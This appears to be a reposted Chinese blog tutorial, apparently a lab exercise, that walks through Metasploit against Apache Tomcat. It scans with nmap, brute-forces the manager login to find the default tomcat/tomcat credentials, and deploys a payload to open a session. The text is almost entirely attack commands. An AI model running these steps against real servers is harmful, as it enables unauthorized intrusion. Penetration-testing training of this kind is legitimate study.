博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
使用msf对tomcat测试
阅读量:6619 次
发布时间:2019-06-25

本文共 800 字,大约阅读时间需要 2 分钟。

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
1.3 在终端中输入命令“msfconsole”,启动MSF终端。
1.4 在终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷。
1.5 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6 在终端下输入“set RHOSTS 192.168.1.3”,设置攻击目标主机IP。
1.7 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
1.8 在终端下输入“exploit”, 实施攻击。获得用户名tomcat,密码tomcat。
1.9 在终端下输入“use exploit/multi/http/tomcat_mgr_deploy”, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.10 在终端下输入“set RHOST 192.168.1.3”,设置攻击的目标主机IP。
1.11 在终端下输入“set RPORT 8180”,设置攻击目标主机端口号。
1.12 在终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat。
1.13 在终端下输入“set password tomcat”,设置攻击时使用的密码tomcat。
1.14 在终端下输入“exploit”,开始攻击,建立会话。

转载于:https://www.cnblogs.com/NBeveryday/p/9557584.html

你可能感兴趣的文章
ubuntu下安装nginx
查看>>
Eclipse快捷键大全(转载)
查看>>
Java 学习笔记之 异常法停止线程
查看>>
ArrayList源码
查看>>
Db2性能:系统CPU高问题分析的一些思路
查看>>
基于Docker一键部署大规模Hadoop集群及设计思路
查看>>
Allegro PCB Design GXL (legacy) 使用slide无法将走线推挤到焊盘的原因
查看>>
php5.4 的 arm 交叉编译
查看>>
XWiki 4.5 M1 发布
查看>>
统计图开发之二:点图元
查看>>
Java面试之SE基础基本数据类型
查看>>
mina源码分析
查看>>
js 正则验证多个邮箱,用;隔开的那种
查看>>
element-ui的rules中正则表达式
查看>>
日常装逼的程序员行为规范
查看>>
临沂吴忠军新浪微博主页
查看>>
检测Android和IOS
查看>>
趣味算法之兔子真能生
查看>>
自己模拟写C++中的String类型
查看>>
Java英文单词Java基础常见英语词汇
查看>>